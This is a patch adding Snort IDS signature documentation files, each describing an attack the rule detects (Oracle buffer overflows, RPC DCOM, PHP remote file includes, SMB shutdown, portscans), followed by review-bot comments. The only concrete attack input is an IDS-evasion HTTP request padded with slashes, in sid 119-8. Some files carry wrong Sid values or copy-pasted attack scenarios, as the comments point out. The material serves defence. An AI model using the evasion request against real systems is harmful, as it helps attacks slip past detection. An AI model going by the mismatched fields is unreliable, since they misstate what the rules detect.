+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
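Review bot: the third paragraph of "Detailed Information" ("validating the credentials of a client host connecting to the services offered on a host server") is generic CGI text that says nothing about SQL injection via the "showtopic" parameter; drop it, or replace it with what injected SQL could do to the "Koobi Pro" database backend, which the second paragraph already hints at. Formatting: the file opens with two blank lines, and the "--" separators after "100000844" and after "All systems running CGI applications using Koobi Pro" are missing the blank line used everywhere else. Typos: "running ona web server" should be "on a web server", "attackers choosing" should be "attacker's choosing".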
--- /dev/null
+++ b/doc/signatures/2159.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+2158
+
+--
+Summary:
+This event is generated when an invalid BGP type is detected. 
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+This event indicates that a Border Gateway Protocol (BGP) packet with an invalid type has been detected.
+
+BGP packets must have a type of 1 or more. This event indicates that a BGP packet was detected with a type of 0. This may be related to another issue regarding invalid BGP datasizes. See sid 2158 for further information.
+
+Note: if sid 2158 has been disabled, this event will be generated if the type of problem described in the documentation for sid 2158 is detected.
+
+--
+Affected Systems:
+This BGP packet may cause problems with TCPDump.
+
+--
+Attack Scenarios:
+An attacker would need to craft a special BGP packet with a type of 0 or a datasize of less than 20 bytes.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
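Review bot: the "Sid:" value is "2158" but the file is doc/signatures/2159.txt and the text twice refers to "sid 2158" as a different rule ("See sid 2158 for further information."); the Sid field should read 2159, otherwise a documentation lookup keyed on Sid resolves to the wrong rule. Also "Corrective Action" says "Upgrade to the latest non-affected version of the software" without naming the software, while the only product mentioned is TCPDump under "Affected Systems"; name it, and add the terminal period.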
--- /dev/null
+++ b/doc/signatures/2942.txt
@@ -0,0 +1,66 @@
+Rule:
+
+--
+Sid:
+2942
+
+--
+Summary:
+This event is generated when an attempt is made to shutdown a Windows
+system via SMB. 
+
+--
+Impact:
+Serious.
+
+--
+Detailed Information:
+This event indicates that an attempt was made to shutdown a Windows
+system via SMB across the network.
+
+It may be possible for an attacker to manipulate a Windows system
+from a remote location. Shutting down a system may lead to a Denial of
+Service for the target host.
+
+--
+Affected Systems:
+	Microsoft Windows systems.
+
+--
+Attack Scenarios:
+An attacker may be able to manipulate a target system using SMB. The
+attacker may gain complete control over the affected system.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of system compromise.
+
+Turn off file and print sharing on the target host.
+
+Use a packet filtering firewall to disallow SMB access to the host from
+sources external to the protected network.
+
+Disallow remote registry manipulation.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
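Review bot: "Impact:" is just "Serious." while the actual consequence is buried in "Detailed Information" ("Shutting down a system may lead to a Denial of Service for the target host."); move the Denial of Service statement up into Impact, as the other files in this patch do. "attempt is made to shutdown a Windows system" (Summary and Detailed Information) should use the verb "shut down", and "False Negatives" uses "None Known." where "False Positives" uses "None known."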
--- /dev/null
+++ b/doc/signatures/2602.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2602
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in database
+replication. The "drop_master_repgroup" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the "gname" variable to cause
+the overflow. The result could permit the attacker to gain escalated
+privileges and run code of their choosing. This attack requires an
+attacker to logon to the database with a valid username and password
+combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck87.html
+
+--
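Review bot: the sentence "If you are running Oracle on a Windows server, make sure that the variable $ORACLE_PORTS is set to a value of "any"." is a rule-configuration instruction, not a description of the vulnerability, and belongs under "Corrective Action" or a separate note where readers tuning the rule will see it. "Attack Scenarios" names the "gname" variable but "Detailed Information" only says "a long string in a parameter for the procedure"; name the parameter in both places. Also "a Oracle database implementation" should be "an Oracle database implementation", and the "Oracle 9i" line is indented with spaces where the other files use a tab.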
--- /dev/null
+++ b/doc/signatures/3311.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3311
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
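Review bot: the body of this file is word-for-word identical to doc/signatures/3398.txt in the same patch, so a reader cannot tell what sid 3311 detects that sid 3398 does not; state the distinguishing condition for this rule (transport, port or request variant). The same defects carry over: "Attack Scenarios" ("an overly long filename via a network share") does not match the RPC DCOM overflow in "Detailed Information", "Additional References:" is empty, and "Expoit" should be "Exploit".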
--- /dev/null
+++ b/doc/signatures/100000606.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000606
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "lang_modify.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the "lang_modify.php" 
+script used by the "Indexu" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
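Review bot: "Attack Scenarios" ("access an authentication mechanism and supply his/her own credentials to gain access") describes a credential attack, not the remote file include via the "admin_template_path" parameter that the Summary documents; the scenario should describe a URL to an attacker-controlled file being passed in that parameter, since that is what the rule matches. The third "Detailed Information" paragraph is the same generic credentials text and can go. Formatting: the "--" after "100000606" and after "All systems running CGI applications using Indexu" lack the preceding blank line used elsewhere, and there is a stray trailing blank line at the end of the file. Typos: "running ona web server", "attackers choosing".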
--- /dev/null
+++ b/doc/signatures/445.txt
@@ -0,0 +1,52 @@
+Rule:
+
+--
+Sid:
+445
+
+--
+Summary:
+This event is generated when an ICMP "SKIP" message is generated.
+
+--
+Impact:
+Informational.  This indicates that an error condition was encountered when requesting the Simple Key Management Protocol for IP (SKIP) protocol to provide keying material.
+
+--
+Detailed Information:
+An ICMP "SKIP" message is issued when a SKIP request to provide keying material fails.  This may occur when the sender makes a request via a SKIP packet for some kind of algorithm, such as encryption, that is not supported by the receiver.  The receiver responds with this ICMP message to indicate that the requested algorithm is not supported. 
+
+--
+Affected Systems:
+This traffic should have no adverse impact.
+
+--
+Attack Scenarios:
+This is not an attack unless these messages are sent in volume for an attempted denial of service.
+
+--
+Ease of Attack:
+Simple. There are many packages available to generate ICMP messages.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+None.
+
+--
+Contributors:
+Original rule writer unknown.
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
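Review bot: the Summary "This event is generated when an ICMP "SKIP" message is generated." is circular; say "is detected", since the rule observes the message rather than producing it. "Affected Systems:" contains an impact statement ("This traffic should have no adverse impact.") instead of a list of systems; move that sentence into Impact and either list the systems or state "None.". "Additional References:" is empty; a link to the SKIP specification would let readers verify the "keying material" description. There are double spaces after periods in Impact and "Detailed Information".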
--- /dev/null
+++ b/doc/signatures/100000436.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000436
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "BlueShoes" application running on a webserver. Access to the file "Bs_Wse_Profile.class.php" using a remote file being passed as the "APP[path][plugins]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "APP[path][plugins]" parameter in the "Bs_Wse_Profile.class.php" script used by the "BlueShoes" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using BlueShoes
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
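Review bot: as in the other remote file include documents in this patch, "Attack Scenarios" describes supplying "his/her own credentials" to an authentication mechanism, which is not the attack the Summary documents (a remote file passed in the "APP[path][plugins]" parameter of "Bs_Wse_Profile.class.php"); rewrite the scenario around the include. The file starts with two blank lines, and the "--" after "100000436" and after "All systems running CGI applications using BlueShoes" lack the blank line used elsewhere. Typos: "running ona web server", "attackers choosing".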
--- /dev/null
+++ b/doc/signatures/3128.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+3128
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft License Logging Service.
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft License Logging Service is used to manage licenses for
+Microsoft server products.
+
+A vulnerability in the service exists due to a programming error such
+that an unchecked buffer may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain administrative access to the target host.
+
+The unchecked buffer exists when processing the length of messages sent
+to the logging service.
+
+--
+Affected Systems:
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2000
+	Microsoft Windows NT Server
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message to the service
+containing code of their choosing to be run on the server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
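Review bot: "Affected Systems" lists "Microsoft Windows Server 2000", which is not a product name (the product is Windows 2000 Server); the list is also in reverse chronological order relative to the other files in this patch. "Additional References:" is empty for a vulnerability that has a vendor bulletin; add it. Whitespace: trailing spaces after "Rule: ", "Sid: ", "Summary: ", "Impact: ", "Attack Scenarios: ", "Ease of Attack: ", "Contributors: " and several "-- " separators, plus a stray blank line between "-- " and "Corrective Action: ".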
--- /dev/null
+++ b/doc/signatures/119-8.txt
@@ -0,0 +1,66 @@
+Rule: 
+
+--
+Sid: 
+119-8
+
+-- 
+Summary: 
+This event is generated when the pre-processor http_inspect
+detects network traffic that may constitute an attack.
+
+-- 
+Impact: 
+Unknown. This may be an attempt to evade an IDS.
+
+--
+Detailed Information:
+This event is generated when the pre-processor http_inspect detects web
+requests that incorporate multiple concurrent "/" characters.
+
+This may be an attempt to obfuscate an attack and may also indicate an
+attempt to evade an IDS.
+
+--
+Affected Systems:
+	All web servers.
+
+--
+Attack Scenarios: 
+An attacker can add multiple "/" characters to a request like this.
+
+GET http://www.victim.com////////////////vulnerable/application.dll
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action:
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches.
+
+--
+Contributors:
+Daniel Roelker <droelker@sourcefire.com> 
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+HTTP IDS Evasions Revisited - Daniel Roelker
+http://docs.idsresearch.org/http_ids_evasions.pdf
+
+--
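Review bot: "multiple concurrent "/" characters" should read "multiple consecutive "/" characters"; "concurrent" suggests timing, whereas the example request "GET http://www.victim.com////////////////vulnerable/application.dll" shows a run of adjacent slashes. "False Positives: None Known." sits uneasily with "Impact: Unknown." and the hedged "may be an attempt to obfuscate an attack"; a sentence on whether benign requests with repeated slashes are expected, and on how to tune the http_inspect pre-processor if they are, would help. Whitespace: stray blank lines after the "-- " separators before "False Positives:" and "Corrective Action:", and trailing spaces on "Rule: ", "Sid: ", "Summary: ", "Impact: ", "Attack Scenarios: ", "Ease of Attack: " and the Daniel Roelker contributor line.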
--- /dev/null
+++ b/doc/signatures/100000681.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000681
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Harpia" application running on a webserver. 
+Access to the file "header.php" using a remote file being passed as the 
+"theme_root" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "theme_root" parameter in the "header.php" script used 
+by the "Harpia" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Harpia
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
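Review bot: "Attack Scenarios" again describes supplying "his/her own credentials" to an authentication mechanism rather than the remote file include via the "theme_root" parameter of "header.php" that the Summary documents; rewrite the scenario around the include, and drop the generic third paragraph of "Detailed Information" about "validating the credentials of a client host". Formatting: the "--" after "100000681" and after "All systems running CGI applications using Harpia" lack the preceding blank line, and there is a stray trailing blank line at the end of the file. Typos: "running ona web server", "attackers choosing".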
--- /dev/null
+++ b/doc/signatures/122-9.txt
@@ -0,0 +1,93 @@
+
+
+Rule:
+
+--
+Sid:
+122-9
+
+--
+Summary:
+This event is generated when the pre-processor sfPortscan detects
+network traffic that may constitute an attack. Specifically an ip
+protocol scan was detected.
+
+--
+Impact:
+Unknown. This is normally an indicator of possible network
+reconnaisance and may be the prelude to a targeted attack against the
+targeted systems.
+
+--
+Detailed Information:
+This event is generated when the sfPortscan pre-processor detects
+network traffic that may consititute an attack.
+
+A portscan is often the first stage in a targeted attack against a
+system. An attacker can use different portscanning techniques and tools
+to determine the target host operating system and application versions
+running on the host to determine the possible attack vectors against
+that host.
+
+More information on this event can be found in the individual
+pre-processor documentation README.sfportscan in the docs directory of
+the snort source. Descriptions of different types of portscanning
+techniques can also be found in the same documentation, along with
+instructions and examples on how to tune and use the pre-processor.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+An attacker often uses a portscanning technique to determine operating
+system type and version and also application versions to determine
+possible effective attack vectors that can be used against the target
+host.
+
+--
+Ease of Attack:
+Simple. Many portscanning tools are freely available.
+
+--
+False Positives:
+While not necessarily a false positive, a security audit or penetration
+test will often employ the use of a portscan in the same way an
+attacker might use the technique. If this is the case, the
+pre-processor should be tuned to ignore the audit if so desired.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check for other events targeting the host.
+
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches as appropriate.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Daniel Roelker <droelker@sourcefire.com>
+Marc Norton    <mnorton@sourcefire.com>
+Jeremy Hewlett <jh@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Nmap:
+http://www.insecure.org/nmap/
+
+Port Scanning Techniques and the Defense Against Them - Roger
+Christopher, SANS:
+http://www.sans.org/rr/whitepapers/auditing/70.php
+
+Hypervivid Tiger Team - Port-Scanning: A Practical Approach
+http://www.hcsw.org/reading/nmapguide.txt
+
+--
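Review bot: "Detailed Information" repeats the Summary ("detects network traffic that may consititute an attack") without saying what the pre-processor counts for an IP protocol scan, which is the only thing that distinguishes 122-9 from the other sfPortscan events; state that condition, and write "IP protocol scan" rather than "ip protocol scan". Typos: "reconnaisance" should be "reconnaissance", "consititute" should be "constitute"; "a targeted attack against the targeted systems" and "Apply any appropriate vendor supplied patches as appropriate." are redundant. The file opens with two blank lines.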
--- /dev/null
+++ b/doc/signatures/2950.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+2950
+
+--
+Summary:
+This event is generated when multiple stacked SMB requests are made.
+
+--
+Impact:
+Possible IDS evasion.
+
+--
+Detailed Information:
+This event is generated when multiple stacked SMB requests are detected.
+This behavior does not occur on a regular basis in normal network
+traffic. This event may indicate an attempt to evade an IDS.
+
+--
+Affected Systems:
+	All systems using SMB.
+
+--
+Attack Scenarios:
+An attacker might create multiple stacked SMB requests in an attempt to
+bypass an IDS.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+If the second and third stacked requests are of a combined length that
+is less than 37 bytes this rule will not generate an event.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disallow the use of SMB.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
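Review bot: the Corrective Action "Apply the appropriate vendor supplied patches" does not fit the rest of the file: Impact and Detailed Information describe an IDS evasion technique (stacked SMB requests), not a vendor vulnerability, so there is nothing to patch, and "Disallow the use of SMB." is disproportionate for an event whose only stated impact is possible evasion. Suggest guidance that matches the event instead, e.g. "Check for other events from the same source host" and "Restrict SMB access at the network perimeter". The first Corrective Action line is also missing its terminating period, and Additional References is empty.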
--- /dev/null
+++ b/doc/signatures/2881.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2881
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure comment_on_priority_group
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
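Review bot: in Detailed Information the last sentence is split with a stray period at the start of a line ("vulnerability in the procedure comment_on_priority_group" / ". This procedure is included in"); rejoin it as "vulnerability in the procedure comment_on_priority_group. This procedure is included in sys.dbms_repcat_conf." The Affected Systems entry "Oracle Oracle9i" repeats the vendor name; use "Oracle9i" or "Oracle 9i". Several headers ("Rule: ", "Sid: ", "-- ") carry trailing whitespace that the other files avoid, and Additional References is empty even though the text names a specific package and procedure.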
--- /dev/null
+++ b/doc/signatures/3087.txt
@@ -0,0 +1,66 @@
+Rule:
+
+--
+Sid:
+3087
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overflow in Microsoft Browser Client Context Tool (W3Who.dll).
+
+--
+Impact:
+Denial of service or remote access. If the exploit is successful,
+an attacker can gain remote access to the host with system privileges.
+
+--
+Detailed Information:
+W3Who is an Internet Server Application Programming Interface (ISAPI)
+application dynamic-link library (DLL) that works within a Web page to
+display information about the calling context of the client browser and
+the configuration of the host server. W3Who is included in the Windows
+2000 Server Resource Kit.
+
+A boundary error within the processing of parameters can be exploited
+to cause a buffer overflow by passing an overly long parameter.
+
+--
+Affected Systems:
+Microsoft IIS with W3Who.dll. (W3Who.dll is not automatically installed
+with IIS.)
+
+--
+Attack Scenarios:
+An attacker can send a malformed HTTP request with an overly long
+parameter to W3Who DLL, subsequently causing a buffer overflow.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+Any overly large request URI with a reference to w3who.dll will be
+detected.
+
+--
+False Negatives:
+This rule only detects the attack when the parameters are passed
+as part of the URI (GET method).
+
+--
+Corrective Action:
+Disable the W3Who.dll ISAPI extension.
+
+--
+Contributors:
+nnposter@users.sourceforge.net
+
+--
+Additional References:
+
+Microsoft:
+http://support.microsoft.com/default.aspx?scid=kb;en-us;Q323640
+
+--
--- /dev/null
+++ b/doc/signatures/839.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+839
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running on a web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
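Review bot: "attackers choosing" in Impact and at the end of Detailed Information needs the possessive, "attacker's choosing". The line "relationships between the victim server and other hosts can be exploited by the attacker." overruns the wrap width used by the rest of the file; rewrap it. More importantly, the body is generic CGI boilerplate: nothing identifies which application or request pattern sid 839 actually matches, and Additional References is empty, so a reader who looks the event up learns nothing specific.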
--- /dev/null
+++ b/doc/signatures/1978.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+1978
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+NGS Whitepaper - Advanced SQL Injection
+www.nextgenss.com/papers/advanced_sql_injection.pdf
+
+--
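Review bot: the Additional References entry "www.nextgenss.com/papers/advanced_sql_injection.pdf" lacks the http:// scheme that every other reference in the patch uses, so it will not be linked; add it. "attackers choosing" in Impact should be "attacker's choosing". The only reference is about SQL injection while Attack Scenarios mentions directory traversal and buffer overflows, and the text never says what sid 1978 specifically matches; either name the check or drop the unrelated reference.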
--- /dev/null
+++ b/doc/signatures/2397.txt
@@ -0,0 +1,54 @@
+Rule:
+
+--
+Sid:
+2397
+
+--
+Summary:
